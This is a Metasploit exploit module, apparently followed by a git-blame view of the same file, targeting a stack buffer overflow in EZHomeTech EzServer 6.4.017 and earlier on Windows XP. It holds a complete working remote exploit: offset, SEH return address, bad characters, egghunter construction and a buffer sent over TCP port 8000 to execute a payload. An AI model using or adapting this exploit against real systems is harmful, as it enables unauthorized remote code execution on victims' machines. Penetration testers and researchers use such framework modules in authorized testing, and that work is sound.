modules/exploits/windows/http/ezserver_http.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EZHomeTech EzServer Stack Buffer Overflow Vulnerability',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the EZHomeTech EZServer
        for versions 6.4.017 and earlier. If a malicious user sends packets
        containing an overly long string, it may be possible to execute a
        payload remotely. Due to size constraints, this module uses the
        Egghunter technique.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '83065' ],
          [ 'BID', '54056' ],
          [ 'EDB', '19266' ],
          [ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',
            {
              'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll
              'Offset' =>	5852
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-06-18',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(8000)])

  end

  def exploit
    connect
    eggoptions =
    {
      :checksum => true,
      :eggtag => "w00t"
    }

    hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
    egg = hunter[1]
    buff = rand_text(target['Offset'] - egg.length) #junk
    buff << egg
    buff << make_nops(32)
    buff << generate_seh_record(target.ret)
    buff << make_nops(16)
    buff << hunter[0]
    buff << rand_text_alpha_upper(500)

    print_status("Triggering shellcode now...")
    print_status("Please be patient, the egghunter may take a while..")

    sock.put(buff)

    handler
    disconnect

  end
end
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Egghunter`
			`include Msf::Exploit::Remote::Seh`
minor fixes 2012-06-18 22:44:17 +02:00
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`def initialize(info = {})`
			`super(update_info(info,`
Add next chunk of fixes 2014-03-11 12:07:27 -05:00			`'Name' => 'EZHomeTech EzServer Stack Buffer Overflow Vulnerability',`
minor fixes 2012-06-18 22:44:17 +02:00			`'Description' => %q{`
Add next chunk of fixes 2014-03-11 12:07:27 -05:00			`This module exploits a stack buffer overflow in the EZHomeTech EZServer`
			`for versions 6.4.017 and earlier. If a malicious user sends packets`
			`containing an overly long string, it may be possible to execute a`
			`payload remotely. Due to size constraints, this module uses the`
			`Egghunter technique.`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`},`
minor fixes 2012-06-18 22:44:17 +02:00			`'License' => MSF_LICENSE,`
			`'Author' =>`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`[`
Correct e-mail format, description, and some commas. 2012-06-18 18:52:26 -05:00			`'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`],`
minor fixes 2012-06-18 22:44:17 +02:00			`'References' =>`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '83065' ],`
ezserver_http: added bid reference 2012-06-20 22:08:58 +02:00			`[ 'BID', '54056' ],`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`[ 'EDB', '19266' ],`
Correct e-mail format, description, and some commas. 2012-06-18 18:52:26 -05:00			`[ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`],`
			`'DefaultOptions' =>`
			`{`
change exitfunc to thread 2015-09-01 10:46:54 +02:00			`'EXITFUNC' => 'thread'`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`},`
minor fixes 2012-06-18 22:44:17 +02:00			`'Platform' => 'win',`
			`'Payload' =>`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`{`
			`'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",`
Correct e-mail format, description, and some commas. 2012-06-18 18:52:26 -05:00			`'DisableNops' => true`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`},`
minor fixes 2012-06-18 22:44:17 +02:00			`'Targets' =>`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`[`
			`[ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',`
			`{`
minor fixes 2012-06-18 22:44:17 +02:00			`'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll`
			`'Offset' => 5852`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`}`
minor fixes 2012-06-18 22:44:17 +02:00			`],`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`],`
minor fixes 2012-06-18 22:44:17 +02:00			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-06-18',`
minor fixes 2012-06-18 22:44:17 +02:00			`'DefaultTarget' => 0))`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(8000)])`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00
			`end`

			`def exploit`
			`connect`
			`eggoptions =`
			`{`
			`:checksum => true,`
			`:eggtag => "w00t"`
			`}`
minor fixes 2012-06-18 22:44:17 +02:00
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)`
minor fixes 2012-06-18 22:44:17 +02:00			`egg = hunter[1]`
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`buff = rand_text(target['Offset'] - egg.length) #junk`
			`buff << egg`
			`buff << make_nops(32)`
			`buff << generate_seh_record(target.ret)`
			`buff << make_nops(16)`
			`buff << hunter[0]`
			`buff << rand_text_alpha_upper(500)`

			`print_status("Triggering shellcode now...")`
			`print_status("Please be patient, the egghunter may take a while..")`
minor fixes 2012-06-18 22:44:17 +02:00
fix all changes suggested by jvazquez-r7 2012-06-19 02:05:25 +07:00			`sock.put(buff)`

			`handler`
			`disconnect`

			`end`
			`end`